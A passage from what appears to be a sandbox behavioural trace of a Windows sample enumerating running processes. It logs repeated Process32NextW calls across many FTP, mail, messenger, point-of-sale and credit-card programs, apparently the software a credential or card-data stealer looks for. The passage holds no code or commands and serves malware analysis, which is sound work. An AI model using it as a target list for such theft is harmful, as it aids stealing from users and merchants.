lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0171.147] lstrlenW (lpString="sihost.exe") returned 10 [0171.147] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.148] lstrlenW (lpString="svchost.exe") returned 11 [0171.148] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0171.149] lstrlenW (lpString="taskhostw.exe") returned 13 [0171.149] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0171.150] lstrlenW (lpString="explorer.exe") returned 12 [0171.150] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0171.151] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0171.151] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0171.151] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0171.151] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0171.152] lstrlenW (lpString="Memory Compression") returned 18 [0171.152] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0171.153] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0171.153] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0171.154] lstrlenW (lpString="SearchUI.exe") returned 12 [0171.154] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0171.154] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0171.154] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0171.155] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0171.155] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0171.156] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0171.156] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0171.157] lstrlenW (lpString="workers.exe") returned 11 [0171.157] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0171.157] lstrlenW (lpString="succeed.exe") returned 11 [0171.158] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0171.158] lstrlenW (lpString="washer jar.exe") returned 14 [0171.158] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0171.159] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0171.159] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0171.160] lstrlenW (lpString="useful_courts.exe") returned 17 [0171.160] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0171.160] lstrlenW (lpString="compounds spanish.exe") returned 21 [0171.160] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0171.161] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0171.161] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0171.162] lstrlenW (lpString="try.exe") returned 7 [0171.162] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0171.172] lstrlenW (lpString="statuteide.exe") returned 14 [0171.172] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0171.173] lstrlenW (lpString="invite.exe") returned 10 [0171.173] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0171.173] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0171.173] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0171.174] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0171.174] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0171.174] lstrlenW (lpString="modules_recommend.exe") returned 21 [0171.174] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0171.175] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0171.175] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.175] lstrlenW (lpString="svchost.exe") returned 11 [0171.175] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0171.176] lstrlenW (lpString="3dftp.exe") returned 9 [0171.176] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0171.176] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0171.177] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0171.401] lstrlenW (lpString="alftp.exe") returned 9 [0171.401] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0172.617] lstrlenW (lpString="barca.exe") returned 9 [0172.617] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0172.618] lstrlenW (lpString="bitkinex.exe") returned 12 [0172.618] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0172.619] lstrlenW (lpString="coreftp.exe") returned 11 [0172.619] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0172.620] lstrlenW (lpString="far.exe") returned 7 [0172.620] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0172.621] lstrlenW (lpString="filezilla.exe") returned 13 [0172.621] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0172.622] lstrlenW (lpString="flashfxp.exe") returned 12 [0172.622] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0172.623] lstrlenW (lpString="fling.exe") returned 9 [0172.623] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0172.624] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0172.624] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0172.625] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0172.625] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0172.626] lstrlenW (lpString="icq.exe") returned 7 [0172.626] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0172.627] lstrlenW (lpString="leechftp.exe") returned 12 [0172.627] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0172.628] lstrlenW (lpString="ncftp.exe") returned 9 [0172.628] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0172.629] lstrlenW (lpString="notepad.exe") returned 11 [0172.629] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0172.630] lstrlenW (lpString="operamail.exe") returned 13 [0172.630] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0172.631] lstrlenW (lpString="pidgin.exe") returned 10 [0172.631] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0172.632] lstrlenW (lpString="scriptftp.exe") returned 13 [0172.632] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0172.632] lstrlenW (lpString="skype.exe") returned 9 [0172.633] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0172.633] lstrlenW (lpString="smartftp.exe") returned 12 [0172.633] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0172.634] lstrlenW (lpString="thunderbird.exe") returned 15 [0172.634] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0172.635] lstrlenW (lpString="totalcmd.exe") returned 12 [0172.635] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0172.636] lstrlenW (lpString="trillian.exe") returned 12 [0172.636] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0172.637] lstrlenW (lpString="webdrive.exe") returned 12 [0172.637] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0172.637] lstrlenW (lpString="whatsapp.exe") returned 12 [0172.638] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0172.638] lstrlenW (lpString="winscp.exe") returned 10 [0172.638] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0172.639] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0172.639] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0172.640] lstrlenW (lpString="active-charge.exe") returned 17 [0172.640] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0172.641] lstrlenW (lpString="accupos.exe") returned 11 [0172.641] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0172.642] lstrlenW (lpString="afr38.exe") returned 9 [0172.642] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0172.643] lstrlenW (lpString="aldelo.exe") returned 10 [0172.643] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0172.643] lstrlenW (lpString="ccv_server.exe") returned 14 [0172.643] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0172.644] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0172.644] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0172.645] lstrlenW (lpString="creditservice.exe") returned 17 [0172.645] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0172.646] lstrlenW (lpString="edcsvr.exe") returned 10 [0172.646] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0172.647] lstrlenW (lpString="fpos.exe") returned 8 [0172.647] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0172.647] lstrlenW (lpString="isspos.exe") returned 10 [0172.647] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0172.648] lstrlenW (lpString="mxslipstream.exe") returned 16 [0172.648] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0172.649] lstrlenW (lpString="omnipos.exe") returned 11 [0172.649] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0172.650] lstrlenW (lpString="spcwin.exe") returned 10 [0172.650] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0172.650] lstrlenW (lpString="spgagentservice.exe") returned 19 [0172.650] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0172.651] lstrlenW (lpString="utg2.exe") returned 8 [0172.651] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0172.652] lstrlenW (lpString="lb_community.exe") returned 16 [0172.652] Process32NextW (in: hSnapshot=0x340, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 